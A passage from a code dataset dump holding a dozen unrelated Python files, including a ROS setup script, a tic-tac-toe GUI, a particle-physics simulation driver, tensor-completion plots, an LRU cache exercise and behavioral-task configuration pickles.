label=label_names[label-1])\n\tax.set_xlabel(feat_names[comp[0]])\n\tax.set_ylabel(feat_names[comp[1]])\n\tax.set_zlabel(feat_names[comp[2]])\n\t#plt.title(feat_names[feat_plot])\n\tplt.legend()\n\tplt.show()\n","sub_path":"hw1/hw1_q1.py","file_name":"hw1_q1.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"546325610","text":"from setuptools import setup\nfrom glob import glob\n\npackage_name = 'tw07'\n\nsetup(\n name=package_name,\n version='3.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (f'share/{package_name}/launch', glob('launch/*_launch.py')),\n (f'share/{package_name}/config', glob('config/*')),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='Hugo Costelha',\n maintainer_email='hugo.costelha@ipleiria.pt',\n description='tw07 - Particle Filter',\n license='BSD',\n tests_require=['pytest'],\n entry_points={\n 
'console_scripts': [\n 'particle_filter = tw07.particle_filter:main',\n 'ground_truth_republisher = tw07.ground_truth_republisher:main',\n ],\n },\n)\n","sub_path":"src/tw07/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"599164609","text":"from TreeNode import TreeNode\n\ndef levelOrderTraversal(root: TreeNode):\n stack=[root]\n while len(stack)>0:\n tree=stack.pop(0)\n if tree is None:\n continue\n stack.append(tree.left)\n stack.append(tree.right)\n # do something here, e.g. print itself\n print(tree.val)\n\n\nif __name__ == '__main__':\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(3)\n root.left.left = TreeNode(4)\n root.left.right = TreeNode(5)\n root.right.left = TreeNode(6)\n root.left.left.right = TreeNode(7)\n levelOrderTraversal(root)\n","sub_path":"code/tree/levelOrderTraversal.py","file_name":"levelOrderTraversal.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"468358693","text":"\"\"\"A game of Rock, Paper, Scissors, Lizard, Spock.\"\"\"\n\nimport random\nimport sys\n\nCHOICES = [\"S\", \"P\", \"R\", \"L\", \"K\"]\n\nCHOICES_DICT = {\n \"S\": \"Scissors\",\n \"P\": \"Paper\",\n \"R\": \"Rock\",\n \"L\": \"Lizard\",\n \"K\": \"Spock\"\n}\n\nVERBS = {\n \"SP\": \"cuts\",\n \"PR\": \"covers\",\n \"RL\": \"crushes\",\n \"LK\": \"poisons\",\n \"KS\": \"smashes\",\n \"SL\": \"decapitates\",\n \"LP\": \"eats\",\n \"PK\": \"disproves\",\n \"KR\": \"vaporizes\",\n \"RS\": \"crushes\"\n}\n\n\ndef player_choice():\n \"\"\"Ask the player for their choice.\"\"\"\n player_move = input(\"What is your choice? (S, P, R, L, K)\").upper()\n while player_move not in CHOICES:\n player_move = input(\"What is your choice? 
(S, P, R, L, K)\").upper()\n return player_move\n\n\ndef dumb_comp():\n \"\"\"Have computer randomly choose between the 5 choices.\"\"\"\n comp_move = random.choice(CHOICES)\n return comp_move\n\n\ndef print_moves(player1, player2):\n \"\"\"Print out the player's and computer's move.\"\"\"\n print(\"Your move:\", CHOICES_DICT[player1])\n print(\"Computer's move:\", CHOICES_DICT[player2], \"\\n\")\n\n\ndef game_winner(player1, player2):\n \"\"\"Determine who wins using VERBS dictionary.\"\"\"\n # Tie = 0, Player = 1, Computer = 2\n if player1 == player2:\n winner = 0\n elif player1 + player2 in VERBS:\n winner = 1\n else:\n winner = 2\n return winner\n\n\ndef print_outcome(result, player1, player2):\n \"\"\"Print out result of the game using logic from game_winner.\"\"\"\n # Tie = 0, Player = 1, Computer = 2\n if result == 0:\n print(\"It's a tie.\", \"\\n\")\n elif result == 1:\n key = player1 + player2\n print(CHOICES_DICT[player1], VERBS[key], CHOICES_DICT[player2])\n print(\"You won!\", \"\\n\")\n elif result == 2:\n key = player2 + player1\n print(CHOICES_DICT[player2], VERBS[key], CHOICES_DICT[player1])\n print(\"Computer wins!\", \"\\n\")\n\n\nif __name__ == '__main__':\n print(\"Lets play Rock, Paper, Scissors, Lizard, Spock!\")\n ties, player_wins, comp_wins, games_played = 0, 0, 0, 0\n\n while 1:\n player = player_choice()\n computer = dumb_comp()\n print_moves(player, computer)\n game_result = game_winner(player, computer)\n print_outcome(game_result, player, computer)\n games_played += 1\n\n if game_result == 0:\n ties += 1\n elif game_result == 1:\n player_wins += 1\n elif game_result == 2:\n comp_wins += 1\n\n play_again = input(\"Play again?\").lower()\n\n while play_again not in [\"yes\", \"y\", \"no\", \"n\"]:\n play_again = input(\"Play again?\").lower()\n if play_again in [\"no\", \"n\"]:\n tie_percent = str(int(ties / games_played * 100)) + \"%\"\n player_win_percent = str(\n int(player_wins / games_played * 100)) + \"%\"\n comp_win_percent = str(int(comp_wins / games_played * 100)) + \"%\"\n\n print(\"=== SCORES ===\")\n print(\"Games:\", games_played)\n print(\"Player Wins:\", player_wins, player_win_percent)\n print(\"Computer Wins:\", comp_wins, comp_win_percent)\n print(\"Ties:\", ties, tie_percent)\n sys.exit()\n","sub_path":"python/challenge159_RockPaperScissors.py","file_name":"challenge159_RockPaperScissors.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"629216457","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'api'\n\nurlpatterns = [\n path('v1/status/', views.status, name='status'),\n path('v1/events/', views.list_events, name='events'),\n path('v1/events//', views.detail_event, name='detail_event'),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"227264253","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\n\ndef setup():\n shelltools.makedirs(\"build\")\n shelltools.cd(\"build\")\n options = \"meson --prefix=/usr --sysconfdir=/etc \\\n --libexec=/usr/libexec/at-spi2 \\\n -Dintrospection=enabled \\\n -Ddbus_daemon=/usr/bin/dbus-daemon \\\n -D docs=true \\\n \"\n \n if get.buildTYPE() == \"emul32\":\n options += \"--datadir=/usr/emul32 \\\n --libexec=/usr/emul32 \\\n --sysconfdir=/usr/emul32 \\\n --libdir=lib32 \\\n -Dintrospection=disabled \\\n -D docs=false ..\"\n\n \n shelltools.system(options)\n \ndef build():\n shelltools.cd(\"build\")\n shelltools.system(\"ninja\")\n \ndef install():\n shelltools.cd(\"build\")\n shelltools.system(\"DESTDIR=%s ninja install\" % get.installDIR())\n \n if get.buildTYPE() == \"emul32\":\n #pisitools.dosed(\"%s/usr/share/dbus-1/services\" % get.installDIR(), \"^(Exec=)\\/usr/tmp\", r\"\\1/usr/libexec/at-spi2\")\n #pisitools.dosed(\"%s/usr/share/dbus-1/accessibility-services\" % get.installDIR(), \"^(Exec=)\\/usr/tmp\", r\"\\1/usr/libexec/at-spi2\")\n pisitools.dosed(\"%s/usr/lib/systemd/user\" % get.installDIR(), \"^(ExecStart=)\\/usr/emul32\", r\"\\1/usr/libexec/at-spi2\")\n pisitools.removeDir(\"/usr/emul32\")\n pisitools.dosym(\"/usr/libexec/at-spi2/at-spi-bus-launcher\", \"/usr/lib/at-spi2-core/at-spi-bus-launcher\")\n return\n \n shelltools.cd(\"..\")\n pisitools.dodoc(\"NEWS\", \"README*\")\n","sub_path":"desktop/misc/at-spi2-core/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"245024410","text":"import tkinter as tk\nimport socket\nimport threading\nfrom PIL import ImageTk, Image\n\nFont_tuple1 = (\"Comic Sans MS\", 20, \"bold\")\nFont_tuple2 = (\"Comic Sans MS\", 13)\n\nclass CustomLabel(tk.Label):\n\n def __init__(self,index, **args):\n tk.Label.__init__(self, **args)\n self.index = index\n\nclass Gui:\n\n def __init__(self):\n self.game_grid = [' ' for i in range(9)]\n self.window = tk.Tk()\n self.window.title('Tic tac toe Game')\n self.window.config(bg='#00ddb0')\n self.window.geometry('600x700')\n self.window.resizable(False, False)\n \n self.label_List = []\n self.symbol_image=None\n\n for i in range(9):\n label = CustomLabel(i,bg='#00ddb0', width=200, height=200, relief='groove', borderwidth=4)\n self.label_List.append(label)\n label.place(x=(i%3)*200, y=(i//3)*200)\n\n self.labelFooter = tk.Label(bg='#210070', width=600, height=200, relief='groove', borderwidth=4)\n self.labelFooter.place(x=0, y=600)\n\n self.result_label = tk.Label(text= 'hello',font=Font_tuple2,bg='#210070', fg='#00ddb0')\n self.result_label.place(x=280, y=640)\n\n symbol_thread = threading.Thread(target=self.get_input)\n symbol_thread.start()\n self.window.mainloop()\n\n\n def get_input(self):\n\n 
symbol = input('>>Enter symbol(X,O):')\n\n        if symbol.upper()=='X':\n            self.symbol_image = self.get_img('./pics/cross.png')\n        else:\n            self.symbol_image = self.get_img('./pics/nought.png')\n\n        for i in range(9):\n            self.label_List[i].bind('<Button-1>', self.display_img)\n\n    def get_img(self,img_path):\n        img = Image.open(img_path)\n        resized_img = img.resize((200,200), Image.ANTIALIAS)\n        res_img = ImageTk.PhotoImage(resized_img)\n\n        return res_img\n\n\n    def display_img(self, event):\n        widget = event.widget\n        widget.config(image=self.symbol_image)\n        print(widget.index)\n\n\ngui= Gui()","sub_path":"gui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"281428232","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nScript for trimming sequences on certain number of nucleotides\nfor removing adapters traces.\n\"\"\"\n\nimport re\nfrom Bio import SeqIO\n\ntrim_left = 45\ntrim_right = 80\n\nfor seq_record in SeqIO.parse(\"MULTIFASTA_FILE_PATH\", \"fasta\"):\n    with open(\"MULTIFASTA_FILE_PATH\", \"a\") as mf_trim:\n        mf_trim.write(f\">{seq_record.id}\\n\")\n        if re.search(\"dir\", seq_record.id):\n            seq = str(seq_record.seq)[trim_left:]\n            mf_trim.write(seq)\n        elif re.search(\"rev\", seq_record.id):\n            seq = str(seq_record.seq)[trim_right:]\n            mf_trim.write(seq)\n        mf_trim.write(\"\\n\")\n","sub_path":"trim_seq.py","file_name":"trim_seq.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"414966697","text":"##########################################\n#\n# Test Data File for the PCC Smoke Test\n#\n##########################################\n\n\n    # PCC Login Data\n# Login into PCC mentioned into Server URL\n# E.g. 
Here it will be Login into PCC-216\nserver_url = \"https://172.17.2.216:9999\"\nuser_name = \"admin\"\nuser_pwd = \"admin\"\n\n #Node data\ntotal_invader = 1\ntotal_server = 2\n\n # Test Data for Invader as Node\n# Update This data as per supported Invader over PCC server\ninvader_node_name = \"i58\"\ninvader_node_host = \"172.17.2.58\"\n\n\n # Test Data to Add Server as Node\n# Update This data as per supported Server over PCC\nserver1_node_name = \"sv8\"\nserver1_node_host = \"172.17.2.101\"\nserver1_bmc_host = \"172.17.3.101\"\nserver1_bmc_user = \"ADMIN\"\nserver1_bmc_pwd = \"ADMIN\"\nserver1_console = \"ttyS1\"\nserver1_managed_by_pcc = \"true\"\nserver1_ssh_keys = \"pcc\"\n\nserver2_node_name = \"sv8\"\nserver2_node_host = \"172.17.2.102\"\nserver2_bmc_host = \"172.17.3.102\"\nserver2_bmc_user = \"ADMIN\"\nserver2_bmc_pwd = \"ADMIN\"\nserver2_console = \"ttyS1\"\nserver2_managed_by_pcc = \"true\"\nserver2_ssh_keys = \"pcc\"\n\n\ntotal_group = 2\n# Test Data for Group Creation\ncreate1_group_name = \"automation_group1\"\ncreate1_group_desc = \"automation_group1\"\ncreate2_group_name = \"automation_group2\"\ncreate2_group_desc = \"automation_group2\"\n\n\n# Assign Group To Node\n# Please make sure group name is present in group list\n# before select group name\n# By Default keep it as \"automation_group\" as we are creating this\n# group just before group assignment test\nassign_group_name = \"automation_group1\"\n\n\ntotal_role = 2\n# Node Role Creation Data\n# It will assign ROOT as role Tenant\ncreate1_role_name = \"automation_role1\"\ncreate1_role_desc = \"automation_role1\"\ncreate2_role_name = \"automation_role2\"\ncreate2_role_desc = \"automation_role2\"\n\n# Assign Roles To Node\n# Please make sure role name is present in role list\n# before select group role\n# By Default it will assign \"LLDP\" roles to node\nassign_role_name = \"LLDP\"\n\n\ntotal_site = 2\n# Site Creation Data\ncreate1_site_name = \"automation_site1\"\ncreate1_site_desc = \"automation_site1\"\ncreate2_site_name = \"automation_site2\"\ncreate2_site_desc = \"automation_site2\"\n\n# Assign Sites To Node\n# Please make sure Site name is present in Site list\n# before select Site name\n# By Default it will assign \"automation_site\" site to node\nassign_site_name = \"automation_site1\"\n\n\ntotal_tenant = 2\n# Tenant Creation Data\ncreate1_tenant_name = \"automation_tenant1\"\ncreate1_tenant_desc = \"automation_tenant1\"\ncreate2_tenant_name = \"automation_tenant2\"\ncreate2_tenant_desc = \"automation_tenant2\"\n\n # Assign Tenant To Node\n# Please make sure Tenant name is present in Tenant list\n# before select Tenant name\n# By Default it will assign \"automation_tenant\" tenant to node\nassign_tenant_name = \"automation_tenant1\"\n","sub_path":"pcc/test_data/vm216/Smoke_Test_216.py","file_name":"Smoke_Test_216.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69639152","text":"import os\nimport MuonConst as muCnst\nimport PionConst as piCnst\nimport nuSTORMPrdStrght as nuPrdStrt\nimport NeutrinoEventInstance as nuEvtInst\nimport PionEventInstance as piEvtInst\nimport numpy as np\nimport Simulation as Simu\nimport sys\nimport particle as particle\nimport eventHistory as eventHistory\n\nnuSIMPATH = os.getenv('nuSIMPATH')\nfilename = os.path.join(nuSIMPATH, \\\n '11-Parameters/nuSTORM-PrdStrght-Params-v1.0.csv')\nnuStrt = nuPrdStrt.nuSTORMPrdStrght(filename)\n \n\nmc = muCnst.MuonConst()\npc = 
piCnst.PionConst()\n\nnuEI = []\npiEI = []\n\nrunNum = 1\neventNum = 1\n#Not sure about the values\n\n\n#Running PiEvt and NuEvt together\nfor i in range(10000):\n\n piEvt= piEvtInst.PionEventInstance(8)\n piEI.append(piEvt)\n tpi=piEvt.gettpi()\n piTraceSpaceCoord=piEvt.getTraceSpaceCoord()\n mu4mmtm=piEvt.getmu4mmtm()\n mucostheta=piEvt.getcostheta()\n nuEI.append(nuEvtInst.NeutrinoEventInstance(tpi, piTraceSpaceCoord, mu4mmtm, mucostheta, nuStrt))\n\nobj = eventHistory.eventHistory()\nobj.outFile(\"testFile1.root\")\nobj.rootStructure()\n\n#Storing the information in particle format\nfor (piEvt,nuEvt) in zip(piEI,nuEI):\n eventWeight = 1 \n #Target\n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"pi-\")\n location = 'target'\n obj.addParticle(location, testParticle)\n \n #Production Straight \n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"pi-\")\n location = 'productionStraight'\n obj.addParticle(location, testParticle)\n \n # 1.Pion decay\n tpi = piEvt.gettpi()\n TSCpi = piEvt.getTraceSpaceCoord()\n ppiz = piEvt.getppiGen()\n testParticle = particle.particle(1, eventNum, TSCpi[0], TSCpi[1], TSCpi[2], TSCpi[3], TSCpi[4]*ppiz, TSCpi[5]*ppiz, ppiz, tpi, eventWeight, \"pi-\")\n location = 'pionDecay'\n obj.addParticle(location, testParticle)\n\n #Pion Flash\n numu4mmtm = piEvt.getnumu4mmtm()\n numu3mmtm = numu4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCpi[0], TSCpi[1], TSCpi[2], TSCpi[3], numu3mmtm[0], numu3mmtm[1], numu3mmtm[2], tpi, eventWeight, \"numu\")\n location=\"piFlashNu\"\n obj.addParticle(location, testParticle)\n\n \n #Muon Production\n mu4mmtm = piEvt.getmu4mmtm()\n mu3mmtm = mu4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCpi[0], TSCpi[1], TSCpi[2], TSCpi[3], mu3mmtm[0], mu3mmtm[1], mu3mmtm[2], tpi, eventWeight, \"mu-\")\n location = \"muonProduction\"\n obj.addParticle(location, testParticle)\n\n \n if(nuEvt.getAbsorbed() == True):\n eventWeight=0\n \n #1. Muon Decay\n tmu = nuEvt.gettmu()\n TSCmu = nuEvt.getTraceSpaceCoord()\n pmuz = nuEvt.getpmu()\n testParticle = particle.particle(1, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], TSCmu[4]*pmuz, TSCmu[5]*pmuz, pmuz, tmu, eventWeight, \"mu-\")\n location='muonDecay'\n obj.addParticle(location, testParticle)\n\n \n #2. Electron Production\n e4mmtm = nuEvt.gete4mmtm()\n e3mmtm = e4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], e3mmtm[0], e3mmtm[1], e3mmtm[2], tmu, eventWeight, \"e-\")\n location='eProduction'\n obj.addParticle(location, testParticle)\n\n \n #3. nue Production\n nue4mmtm = nuEvt.getnue4mmtm()\n nue3mmtm = nue4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], nue3mmtm[0], nue3mmtm[1], nue3mmtm[2], tmu, eventWeight, \"nue\")\n location='nueProduction'\n obj.addParticle(location, testParticle)\n \n \n #4. 
numu Production\n numu4mmtm = nuEvt.getnumu4mmtm()\n numu3mmtm = numu4mmtm[1]\n testParticle = particle.particle(runNum, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], numu3mmtm[0], numu3mmtm[1], numu3mmtm[2], tmu, eventWeight, \"numu\")\n location='numuProduction'\n obj.addParticle(location, testParticle)\n \n # numu Detector\n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"numu\")\n location = 'numuDetector'\n obj.addParticle(location, testParticle)\n \n # nue Detector\n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"nue\")\n location = 'nueDetector'\n obj.addParticle(location, testParticle)\n obj.fill()\n \n \nobj.write()\nobj.outFileClose() \n\n\n","sub_path":"01-Code/nuSTORMring.py","file_name":"nuSTORMring.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"451870121","text":"import sys\nimport pylab as plt\nimport pickle\nimport numpy as np\nimport scipy.io\nimport core_code as cc\nimport torch\nimport random\nnp.random.seed(0)\ntorch.manual_seed(0)\nrandom.seed(2)\nfrom xp_completion_einstein import extract_observed_entries\n#plt.style.use('ggplot')\nfrom matplotlib import rc \n#rc('font',**{'sans-serif':['Helvetica']})\n\n#rc('text', usetex=True)\n\ndef tt_parameters(imsize, rank):\n \"\"\"\n This function returns the number of parameters of a TT decomposition with\n uniform rank [rank] of a tensor of shape imsize\n \"\"\"\n rank = [rank] * (len(imsize)-1)\n d_left = np.cumprod(imsize)[:-1]\n d_right = np.cumprod(imsize[::-1])[::-1][1:]\n for i in range(len(rank)):\n rank[i] = np.min([rank[i],d_left[i],d_right[i]])\n rank.insert(0,1); rank.append(1)\n imsize.insert(0,1); imsize.append(1)\n L = [rank[i-1]*rank[i]*imsize[i] for i in range(1,len(imsize)-1)]\n return np.sum(L)\n\n\norder='F'\n\nnploty=7\nnplotx=5\nfig_args={'dpi':250,'figsize':(nplotx,nploty)}\nfontsize=5\nlw=2\nms=3\nimport core_code as cc\n\nif __name__ == '__main__':\n\tif len(sys.argv) < 2:\n\t\tprint(f\"usage: python {sys.argv[0]} [results-pickle-file(s)]\\n \\t results-pickle-file(s): pickle file(s) containing results\")\n\n\tif 'einstein' in sys.argv[1]:\n\t\txp = 'einstein'\n\t\timage = scipy.io.loadmat('data/Einstein.mat')['Data'] \n\t\timage = np.asfortranarray(image).astype(float)\n\t\tim_size=image.shape\n\t\timage_reshaped = image.reshape([6,10,10,6,10,10,3],order=order)\n\t\tindices,values,im_missing = extract_observed_entries(image_reshaped,missing_rate=0.9,is_color_image=False)\n\t\t# results from Wang's paper\n\t\ttr_als_errors=[33.97,14.03,10.83,14.55]\n\t\ttr_als_params=[55*2**2,55*10**2,55*18**2,55*28**2]\n\t \n\t\ttt_als_errors=[38.51, 22.89, 20.70, 23.19]\n\t\ttt_als_params=[202,3545,10089,22949]\n\telif 'yale' in sys.argv[1]:\n\t\txp = 'yale'\n\t\ttensor_shape = [6,8,6,7,8,8,19,2]\n\t\timage = scipy.io.loadmat('data/YaleBCrop025.mat')['I']\n\t\timage = np.asfortranarray(image).astype(float)\n\t\tim_size=image.shape\n\t\timage_reshaped = image.reshape(tensor_shape,order=order)\n\t\tindices,values,im_missing = extract_observed_entries(image_reshaped,missing_rate=0.9,is_color_image=False)\n\t\ttr_als_params = [np.sum(tensor_shape) * R**2 for R in [5,10,15,20,25,30]]\n\t\tprint(tr_als_params)\n\t\tprint(tensor_shape)\n\t\ttr_als_errors = [33.45, 24.67, 20.72, 18.47, 16.92, 16.25]\n\n\t\ttt_als_params = [1149, 3800, 7855, 13360, 20315, 28720]\n\t\ttt_als_errors = [37.08, 29.65, 27.91, 26.84, 26.16, 25.55,]\n\telif 'video' in sys.argv[1]:\n\t\txp = 
'video'\n\t\ttensor_shape=[5,2,5,2, 13,2,5,2, 3, 5,17]\n\t\timage = scipy.io.loadmat('data/VideoData.mat')['Data'] \n\t\timage = np.asfortranarray(image).astype(float)\n\t\tim_size=image.shape\n\t\timage_reshaped = image.reshape(tensor_shape,order=order)\n\t\tindices,values,im_missing = extract_observed_entries(image_reshaped,missing_rate=0.9,is_color_image=False)\n\t\ttr_als_params = [np.sum(tensor_shape) * R**2 for R in [10,15,20,25,30]]\n\t\ttr_als_errors = [13.90, 10.12, 8.13, 6.88, 6.25]\n\n\t\ttt_als_params = [tt_parameters(tensor_shape,R) for R in [10,15,20,25,30]]\n\t\ttt_als_errors = [19.16, 14.83, 16.42, 16.86, 16.99]\n\n\n\n\n\tgreedy_errors = []\n\tgreedy_params = []\n\n\n\tsubplot_index = 1\n\tif xp=='einstein': #plot original and missing\n\t\tfig = plt.figure(**fig_args)\n\t\t\n\t\tplt.subplot(nploty,nplotx,subplot_index)\n\t\tsubplot_index += 1\n\t\tplt.imshow(image.reshape(im_size,order='F')/255)\n\t\tplt.axis('off')\n\t\tplt.title(f\"target image\",fontsize=fontsize)\n\t\tplt.subplot(nploty,nplotx,subplot_index)\n\t\tsubplot_index += 1\n\t\tplt.imshow(im_missing.reshape(im_size,order=order).astype(np.uint8))\n\t\tplt.axis('off')\n\t\tplt.title(f\"observed pixels\",fontsize=fontsize)\n\n\tfor fn in sys.argv[1:]:\n\t\twith open(fn,'rb') as f:\n\t\t\tresults = pickle.load(f)\n\n\n\t\t# losses = [loss for r in results[1:] for loss in r['train_loss_hist']]\n\t\t# plt.plot(range(len(losses)), losses)\n\t\t# plt.xlabel('epoch')\n\t\t# plt.ylabel('loss')\n\t\t# plt.legend(['greedy'])\n\t\t# #plt.title(fn)\n\t\t# plt.tight_layout()\n\n\n\t\tfor res in results[1:]:\n\n\t\t\tim = cc.wire_network(res['network'],give_dense=True).detach().numpy().reshape(im_size,order='F')\n\t\t\tparams=res['num_params']\n\t\t\terror=np.linalg.norm((image-im).ravel())/np.linalg.norm(image.ravel())*100\n\n\t\t\tgreedy_errors.append(error)\n\t\t\tgreedy_params.append(params)\n\t\t\tif len(greedy_params) > 1 and greedy_params[-1] == greedy_params[-2]:\n\t\t\t\tdel greedy_params[-2]\n\t\t\t\tdel greedy_errors[-2]\n\t\t\t\tsubplot_index -= 1\n\t\t\tif xp == 'einstein':\n\t\t\t\tplt.subplot(nploty,nplotx,subplot_index)\n\t\t\t\tsubplot_index += 1\n\t\t\t\tplt.imshow(im/255)\n\t\t\t\tplt.axis('off')\n\t\t\t\tplt.title(f\"Iter. 
{subplot_index-3} - {params} param.\\ntest error = {error:.2f}\\\\%\",fontsize=fontsize)\n\t\t\t\t#f\"Greedy-TL (iter={res_counter})\\n{params} param.\"\n\t\t\tprint(params,error)\n\t\t\t#plt.show()\n\t\t\n\tplt.tight_layout()\n\tplt.style.use('ggplot')\n\tplt.figure()\n\tplt.plot(greedy_params,greedy_errors,'o-',lw=lw,ms=ms)\n\tplt.plot(tr_als_params,tr_als_errors,'o-',lw=lw,ms=ms)\n\tplt.plot(tt_als_params,tt_als_errors,'o-',lw=lw,ms=ms)\n\tplt.legend(\"Greedy TR-ALS TT-ALS\".split())\n\tplt.xlabel(\"parameters\")\n\tplt.ylabel(\"relative error\")\n\tplt.title('Einstein Image Completion')\n\tplt.tight_layout()\n\t\n\tplt.show()","sub_path":"plot_results_completion.py","file_name":"plot_results_completion.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"360729944","text":"from collections import deque\n\ndef solution(cacheSize, cities):\n answer = 0\n\n queue = deque()\n for city in cities:\n if str(city).lower() in queue:\n answer += 1\n queue.remove(str(city).lower())\n queue.append(str(city).lower())\n else:\n answer += 5\n\n if cacheSize == 0:\n continue\n\n if len(queue) < cacheSize:\n queue.append(str(city).lower())\n else:\n queue.popleft()\n queue.append(str(city).lower())\n\n\n return answer\n\n# print(solution(3, [\"Jeju\", \"Pangyo\", \"Seoul\", \"NewYork\", \"LA\", \"Jeju\", \"Pangyo\", \"Seoul\", \"NewYork\", \"LA\"]))\nprint(solution(5, [\"Jeju\", \"Pangyo\", \"Seoul\", \"NewYork\", \"LA\", \"SanFrancisco\", \"Seoul\", \"Rome\", \"Paris\", \"Jeju\", \"NewYork\", \"Rome\"]))","sub_path":"프로그래머즈/[1차]캐시/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539720164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 12 12:20:21 2014\nCreates pickle files necessary to run behav_gui.py.\n@author: tsalo\n\"\"\"\nimport pickle\nimport inspect\nimport os\n\ncode_dir = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\npar_dir = os.path.dirname(code_dir)\n\n## Pseudo-randomized order of versions of each task.\neach_order = {\"RISE\": [[['A'], ['A'], ['B'], ['B'], ['C'], ['C']],\n [['B'], ['C'], ['A'], ['C'], ['A'], ['B']],\n [['C'], ['B'], ['C'], ['A'], ['B'], ['A']]],\n \"AX\": [[['1']],\n [['1']],\n [['1']]],\n \"Kirby\": [[['1']],\n [['1']],\n [['1']]],\n \"Decimal\": [[['Messy first'], ['Rounded first']],\n [['Rounded first'], ['Messy first']],\n [['Messy first'], ['Rounded first']]],\n }\n\nwith open(code_dir + '/each_order.pickle', 'w') as file_:\n pickle.dump(each_order, file_)\n\n## Files associated with each task/task-version.\nfile_dict = {\"RISE\": {\"A\": {\"Part1\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionA\\\\RISE1_2_PART1_VersionA.ebs2\",\n \"Part2\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionA\\\\RISE1_2_PART2_VersionA.ebs2\",\n },\n \"B\": {\"Part1\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionB\\\\RISE1_2_PART1_VersionB.ebs2\",\n \"Part2\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionB\\\\RISE1_2_PART2_VersionB.ebs2\",\n },\n \"C\": {\"Part1\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionC\\\\RISE1_2_PART1_VersionC.ebs2\",\n \"Part2\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionC\\\\RISE1_2_PART2_VersionC.ebs2\",\n },\n },\n \"AX\": {\"1\": par_dir + \"\\\\AXCPT_CNTRACS\\\\EP2-AXCPT_rev3_6.24.14.ebs2\",\n },\n \"Kirby\": {\"1\": par_dir + 
\"\\\\DelayDiscount\\\\Kirby\\\\KirbyDiscounting_CarterEP2_v1.ebs2\",\n },\n \"Decimal\": {\"Messy first\": par_dir + \"\\\\DelayDiscount\\\\Decimal\\\\chooserewardSSB_Short_MessyFirst_CarterEP2_v2.ebs2\",\n \"Rounded first\": par_dir + \"\\\\DelayDiscount\\\\Decimal\\\\chooserewardSSB_Short_RoundedFirst_CarterEP2_v2.ebs2\",\n },\n }\n\nwith open(code_dir + '/file_dict.pickle', 'w') as file_:\n pickle.dump(file_dict, file_)\n\n## CSV files to log version used for a given subject/timepoint for each task.\ntask_info = {\"RISE\": {\"file\": code_dir + \"\\\\rise_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4],\n },\n \"AX\": {\"file\": code_dir + \"\\\\ax_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4]},\n \"Kirby\": {\"file\": code_dir + \"\\\\kirby_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4]},\n \"Decimal\": {\"file\": code_dir + 